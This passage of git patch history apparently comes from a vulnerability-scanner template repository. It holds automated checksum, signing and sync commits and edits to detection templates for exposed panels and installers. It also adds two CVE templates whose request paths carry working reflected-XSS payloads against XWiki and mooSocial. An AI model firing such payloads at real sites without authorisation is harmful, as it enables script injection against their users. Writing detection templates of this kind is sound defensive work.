@@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/cves/2024/CVE-2024-3097.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' From 1a74b478aa84d00610ad38b29bcfa28664714b1d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:56:44 +0000 Subject: [PATCH 1028/1768] Auto Template Signing [Wed May 15 03:56:44 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3097.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index d8356d638a..4c3d3c3a57 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -48,3 +48,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cbbf0399ce12993e42e1bab0102c7122f6df5098 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:57:03 +0000 Subject: [PATCH 1029/1768] Auto Generated New Template Addition List [Wed May 15 03:57:03 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 25ef20c856..739939780e 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/pocketbase-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml +http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/moosocial-installer.yaml From 32b0128c6e88a0488f94089c2833548957df6685 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:27:10 +0530 Subject: [PATCH 1030/1768] fix FN matchers --- http/exposed-panels/cacti-panel.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index f15f6bb24b..26155bc361 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -12,12 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 product: cacti vendor: cacti shodan-query: http.favicon.hash:-1797138069 fofa-query: icon_hash="-1797138069" - tags: tech,cacti,login,panel + tags: cacti,login,panel,detect http: - method: GET @@ -27,18 +28,14 @@ http: stop-at-first-match: true - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - "Login to Cacti" - "The Cacti Group" - condition: and + condition: or - type: regex part: header From 020110bbf38782db0f20328885338caa4495bc52 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:57:17 +0000 Subject: [PATCH 1031/1768] Auto Generated Templates Checksum [Wed May 15 03:57:17 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1b944102f5..b167fe10d0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4439,6 +4439,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3 http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4 http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4 http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9 +http/exposed-panels/tiny-rss-panel.yaml:d92cd21d2be017095150d3ad9e298cdb15228015 http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1 http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d @@ -8528,7 +8529,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1b50b4125ef938d3ca75976b6462aab4643af44b +templates-checksum.txt:e8fb0a930b139ff484171995e9e8979774453c60 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e7aa03c4ff50f17c420e4a7e6d185c78b58151b5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:57:47 +0000 Subject: [PATCH 1032/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ea22d0de4b..3488c06510 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/pocketbase-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' + - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' From eff1584884781540b0efb376d33db023bc4a3a14 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:31:10 +0530 Subject: [PATCH 1033/1768] Update froxlor-installer.yaml --- http/misconfiguration/installer/froxlor-installer.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index 4bee3970e4..7c4ba2c638 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Froxlor Server Management Panel - Installation" - tags: misconfig,froxlor,installer,setup + tags: misconfig,froxlor,installer http: - method: GET @@ -24,7 +24,7 @@ http: - type: word part: body words: - - "Froxlor Server Management Panel - Installation" + - "Froxlor Server Management Panel - Installation" - type: status status: From 3948f8fc2cbd6300f6c38ff37219a51085dc4526 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:01:34 +0000 Subject: [PATCH 1035/1768] Auto Generated Templates Checksum [Wed May 15 04:01:34 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b167fe10d0..5298e7cf2a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3278,7 +3278,7 @@ http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc -http/cves/2024/CVE-2024-3097.yaml:774f7a0efb9b68a93dfda3f53418fcb4f23af138 +http/cves/2024/CVE-2024-3097.yaml:4185bbc6b136c6f1674cf35e66d4c4142e75bb0e http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 @@ -3628,7 +3628,7 @@ http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548 http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc -http/exposed-panels/cacti-panel.yaml:522433ee64137fb9e5195f26a080b5c0f3b89bc8 +http/exposed-panels/cacti-panel.yaml:2d3c5877d8f9ce9109e4e2652720f9cffb2dc0ae http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176 http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173 @@ -8529,7 +8529,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8fb0a930b139ff484171995e9e8979774453c60 +templates-checksum.txt:e0c54974d4232b38654fb8fd736629697b01379e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3aaced79be9d2fe17b6b560e5970cff8dbb401e5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:03:15 +0000 Subject: [PATCH 1036/1768] Auto Template Signing [Wed May 15 04:03:15 UTC 2024] :robot: --- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/tiny-rss-panel.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 26155bc361..e998a1a95e 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -48,4 +48,4 @@ http: group: 1 regex: - "<div class='versionInfo'>Version (.*) |" -# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b3110f2d77b3f6513cc8f7e915660505f5f1414f89715d1fc1a562bde90075fa02201dcff79552b3f5d1622fc45bda5868f3a4b43b6bc5edf01210dc46a04630f1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 456deebdd8..8686589488 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -25,3 +25,4 @@ http: - 'status_code==200' - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and +# digest: 4a0a00473045022100840ed0e143bb8658c51929c452c2c7f11395d2611929d4b2306fb2c7bdfc881002205726c2e4a715d6d13a7b64305182dd78122a0c4e647bf3e6ed66f815b2d8577b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9335c72919d176754e0019aea2394d2a1bd8b86c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:34:53 +0530 Subject: [PATCH 1037/1768] Update custom-xoops-installer.yaml --- http/misconfiguration/installer/custom-xoops-installer.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index 6af3ad2175..7bd4a43d7f 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -1,7 +1,7 @@ id: custom-xoops-installer info: - name: XOOPS Custom Installer - Exposed + name: XOOPS Custom - Installation author: DhiyaneshDK severity: high description: | @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="XOOPS Custom Installation" - tags: misconfig,xoops,installer,setup + tags: misconfig,xoops,installer http: - method: GET From 2952e2d91881e5aceb20d10e3fb749aaf51f98b4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:05:22 +0000 Subject: [PATCH 1038/1768] Auto Generated New Template Addition List [Wed May 15 04:05:22 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 739939780e..78308ea172 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml +http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml From 307edb1c0a6fcaa32d5ecc7f95b4490cd500ff10 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:05:30 +0000 Subject: [PATCH 1039/1768] Auto Generated Templates Checksum [Wed May 15 04:05:30 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5298e7cf2a..72ba7315c2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3628,7 +3628,7 @@ http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548 http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc -http/exposed-panels/cacti-panel.yaml:2d3c5877d8f9ce9109e4e2652720f9cffb2dc0ae +http/exposed-panels/cacti-panel.yaml:d8df896275c8442591f3ee3e3fb969618da78aaf http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176 http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173 @@ -4439,7 +4439,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3 http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4 http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4 http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9 -http/exposed-panels/tiny-rss-panel.yaml:d92cd21d2be017095150d3ad9e298cdb15228015 +http/exposed-panels/tiny-rss-panel.yaml:de8fb04fcf6c23c02809fccfb37249b02a89aa14 http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1 http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d @@ -5396,6 +5396,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/froxlor-installer.yaml:e3a2af5a8d7475eef58a8b6a88eb2267ac347d4a http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 @@ -8529,7 +8530,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e0c54974d4232b38654fb8fd736629697b01379e +templates-checksum.txt:2513db0e0348406e05aea64aaaab436dfb52cc4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e3e3c4b50cc8d00e2b20176c6c5d6f90d15286a9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:06:08 +0000 Subject: [PATCH 1040/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3488c06510..91076b1cbb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' + - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' From 5ccf112d057259a8e918956e3e017a9e1174e0f6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:07:07 +0000 Subject: [PATCH 1041/1768] Auto Template Signing [Wed May 15 04:07:07 UTC 2024] :robot: --- http/misconfiguration/installer/froxlor-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index 7c4ba2c638..1c93802949 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ca0ee8716e91d55cf8bc1d912b11d301b57e873b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:11:06 +0000 Subject: [PATCH 1042/1768] Auto Generated New Template Addition List [Wed May 15 04:11:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 78308ea172..19bc997a04 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml +http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml From f5143dc78d598e86b2c837708c05f25f9dafe9aa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:11:11 +0000 Subject: [PATCH 1043/1768] Auto Generated Templates Checksum [Wed May 15 04:11:11 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 72ba7315c2..66c83d9ca8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5385,6 +5385,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 +http/misconfiguration/installer/custom-xoops-installer.yaml:d616ad8b7ead738c10458cd6cabbf31fa18683dc http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f @@ -5396,7 +5397,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/froxlor-installer.yaml:e3a2af5a8d7475eef58a8b6a88eb2267ac347d4a +http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 @@ -8530,7 +8531,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2513db0e0348406e05aea64aaaab436dfb52cc4e +templates-checksum.txt:cbad61704aa4d1d43cde2cb1311c497d8c317993 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b88d865487f23c8443a7a348f494aa970c97a9c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:11:46 +0000 Subject: [PATCH 1044/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 91076b1cbb..15a344e683 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' + - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' From fa4cb2d6744565fe9b02d89a4b64f29b48c4177f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:12:57 +0000 Subject: [PATCH 1045/1768] Auto Template Signing [Wed May 15 04:12:57 UTC 2024] :robot: --- http/misconfiguration/installer/custom-xoops-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index 7bd4a43d7f..6eaa0776c4 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b574595ed002b9b6b399e1371f8a7943097ad77d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 10:44:26 +0530 Subject: [PATCH 1046/1768] Create CVE-2023-35158.yaml --- http/cves/2023/CVE-2023-35158.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35158.yaml diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml new file mode 100644 index 0000000000..002255372b --- /dev/null +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-35158 + +info: + name: XWiki - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Update XWiki to the latest version to mitigate the Reflected XSS vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-35158 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35158 + cwe-id: CWE-87 + epss-score: 0.00105 + epss-percentile: 0.42103 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: xwiki + product: xwiki + shodan-query: "XWiki" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)" + + matchers: + - type: dsl + dsl: + - 'contains(body, "href=\"javascript:alert(document.domain)\">Cancel</a>")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 3456d3574ff5c47c0f87351c853c5d4056f9b321 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 10:59:46 +0530 Subject: [PATCH 1047/1768] Create CVE-2023-44813.yaml --- http/cves/2023/CVE-2023-44813.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44813.yaml diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml new file mode 100644 index 0000000000..77040b15e1 --- /dev/null +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-44813 + +info: + name: mooSocial v.3.1.8 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function. + impact: | + Successful exploitation could lead to unauthorized access or data theft + remediation: | + Upgrade to a patched version of mooSocial + reference: + - https://github.com/ahrixia/CVE-2023-44813 + - https://nvd.nist.gov/vuln/detail/CVE-2023-44813 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44813 + cwe-id: CWE-79 + epss-score: 0.00069 + epss-percentile: 0.28937 + cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: moosocial + product: moosocial + shodan-query: http.favicon.hash:702863115 + tags: cve,cve2023,moosocial,xss + +http: + - method: GET + path: + - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;'" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "initInviteFriendBtn('model');alert(1)//;" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 